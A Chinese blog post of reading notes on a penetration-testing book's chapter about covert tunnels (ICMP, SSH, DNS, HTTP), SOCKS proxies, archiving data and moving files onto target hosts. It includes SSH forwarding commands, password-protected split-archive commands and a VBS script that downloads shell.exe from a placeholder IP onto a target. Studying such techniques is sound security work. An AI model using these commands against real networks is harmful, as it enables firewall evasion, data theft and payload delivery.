1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > 《内网安全攻防:渗透测试实战指南》读书笔记(三):隐藏通信隧道技术

《内网安全攻防:渗透测试实战指南》读书笔记(三):隐藏通信隧道技术

时间:2022-09-30 20:39:32

相关推荐

《内网安全攻防:渗透测试实战指南》读书笔记(三):隐藏通信隧道技术

目录

前言一、基础知识1、概述2、判断内网的连通性二、网络层隧道技术1、IPv6隧道2、ICMP隧道三、传输层隧道技术四、应用层隧道技术1、SSH隧道2、HTTP/HTTPS隧道3、DNS隧道五、SOCKS代理六、压缩数据1、rar.exe2、7-zip七、上传和下载1、VBS2、Debug上传3、其他结语

前言

本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,是第三章隐藏通信隧道技术,详细介绍了IPv6隧道、ICMP隧道、HTTPS隧道、SSH隧道、DNS隧道等加密隧道的使用方法,并对常见的SOCKS代理工具及内网上传/下载方法进行了解说

相关知识之前也有过学习整理,参见:内网渗透系列:内网穿透(隧道)学习

一、基础知识

1、概述

网络隐藏通信隧道是与目标主机进行信息传输的主要工具

在大量TCP、UDP通信被防御系统拦截的情况下,DNS、ICMP等难以禁用的协议已经被攻击者利用,成为攻击者控制隧道的主要通道

常用隧道:

网络层:IPv6隧道、ICMP隧道、GRE隧道传输层:TCP隧道、UDP隧道、常规端口转发应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道

2、判断内网的连通性

判断方法如下:

//ICMP协议ping //TCP协议nc -zv 192.168.1.10 80//HTTP协议curl :80//curl的代理模式curl -x proxy-ip:port //DNS协议//windows下的nslookupmslookup vps-ip//linux下的digdig @vps-ip

二、网络层隧道技术

1、IPv6隧道

IPv6隧道可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中

几种工具:

socat6tunnelnt6tunnel

2、ICMP隧道

在一般的通信协议中,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要

可参见:内网渗透系列:内网隧道之ICMP隧道

三、传输层隧道技术

主要是TCP隧道、UDP隧道和常规端口转发,大部分都会被拦截

工具可以参见:内网渗透系列:内网穿透(隧道)学习

四、应用层隧道技术

1、SSH隧道

几乎所有的Linux/UNIX服务器和网络设备都支持SSH协议,SSH协议是被允许通过防火墙和边界设备的,所以经常被攻击者利用

//本地转发ssh -CfNg -L 1153(VPS端口):1.1.1.10(目标IP):3389(目标端口)root@192.168.1.11(跳板机)//远程转发ssh -CfNg -R 3307(VPS端口):1.1.1.10(目标IP):3389(目标端口)root@192.168.1.4

-L本地端口转发,-R远程端口转发,-D动态转发(SOCKS代理)**

防御:

IP白名单ACL限制请求IP设置系统完全使用带外管理

2、HTTP/HTTPS隧道

reGeorg、meterpreter、tunna等,都很有名

3、DNS隧道

DNS是一个必不可少的服务,DNS报文本身具有穿透防火墙的能力。

从DNS协议的角度看,只是在一次次的查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实返回的是任意字符串,包括加密的C2指令。

DNS隧道本质是将其他协议封装在DNS协议中进行传输。

参见:内网渗透系列:内网隧道之DNS隧道

五、SOCKS代理

SOCKS是"SOCKetS"的缩写

SOCKS4只支持TCP协议SOCKS5不仅支持TCP/UDP协议,还支持各种身份验证机制

SOCKS代理更底层,是在会话层;而HTTP代理是在应用层。因此SOCKS代理可以代理一切客户端的连接,而HTTP代理只能代理使用HTTP协议的客户端。由于更底层,不需要处理高级协议的细节,所以SOCKS代理更快。

SOCKET被称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,可以用来实现不同计算机之间的通信,它的本质是编程接口(API),是对TCP/IP的封装。SOCKS是一个代理协议,目前最新版本为SOCKS5,所谓代理就是,你可以通过它的去间接的访问网络,相当于一个中转站。区别:SOCKET是一个API,一个工具,让你建立网络连接用的。SOCKS是协议,是一组数据结构。

目前VPN隧道协议主要有4种:点到点隧道协议PPTP、第二层隧道协议L2TP、网络层隧道协议IPSec以及SOCKS v5协议。其中,PPTP和L2TP工作在数据链路层,IPSec工作在网络层,SOCKS v5工作在会话层。

e.g. EarthWorm(ew、新版本Termite)、reGeorg、sSocks、SocksCap64(SSTap)、Proxifier、ProxyChains

六、压缩数据

1、rar.exe

将E:\webs\目录下的所有内容打包为1.rar放入E:\webs\目录下

rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\

将E:\webs\1.rar解压到当前根目录下

rar.exe e E:\webs\1.rar

分卷压缩E盘API目录下的所有文件及文件夹,设置每个分卷为20M

rar.exe a -m0 -r -v20m E:\test.rar E:\API

将E:\test.part01.rar解压到E盘的x1目录下

rar.exe x E:\test.part01.rar E:\x1

2、7-zip

将E:\webs\目录下的所有内容打包为1.7z放入E:\webs\目录下

7z.exe a -k -r -p12345 E:\webs\1.7z E:\webs\

将E:\webs\1.7z解压到当前根目录下

7z.exe e -p12345 E:\webs\1.7z

分卷压缩E盘API目录下的所有文件及文件夹,设置每个分卷为20M

7z.exe -r -vlm -padmin a E:\test.7z E:\API

将E:\test.part01.7z解压到E盘的x1目录下

7z.exe x -padmin E:\test.7z.001 -oE:\x1

七、上传和下载

1、VBS

执行下面命令即可在目标主机上下载shell.exe文件

Cscript download.vbs

download.vbs代码:

Set Post=CreateObject("Msxml2.XMLHTTP")Set shell = CreateObject("Wscript.Shell")post.Open "GET","http://IP/shell.exe",0post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()aGet.Write(post.responseBody)aGet.SaveToFile "C:\test\shell.exe",2

2、Debug上传

先将需要上传的EXE文件转换为十六进制HEX的形式,再通过echo命令将HEX代码写人文件,最后利用Debug功能将HEX代码编译并还原成EXE文件

在KaliLlnux中,exe2bat.exe工具位于/usr/share/windows-binaries目录,执行

wine exe2bat.exe ew.exe ew.txt

将ew.exe转换为ew.txt

然后,利用目标服务器的Debug功能将HEX代码还原为EXE文件

再使用echo命令将ew.txt里面的代码复制到目标系统的命令行环境中

3、其他

还可以用以下这些上传文件:

Nishang:利用Nishang将上传的EXE文件转换为十六进制的形式,然后使用echo命令访问目标服务器,最后使用Download_Execute脚本下载文本文件并将其转换为EXE文件bitsadmm:推荐在Windows7和Windows8主机上使用,注意它不支持HTTPS和FTP协议,也不支持WindowsXP/Sever及以前的版本PowerShell下载

结语

本章主要是隐匿通信隧道,由于这部分知识之前有过学习,故此处就不详细记录了,具体可见博客其他相关文章

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。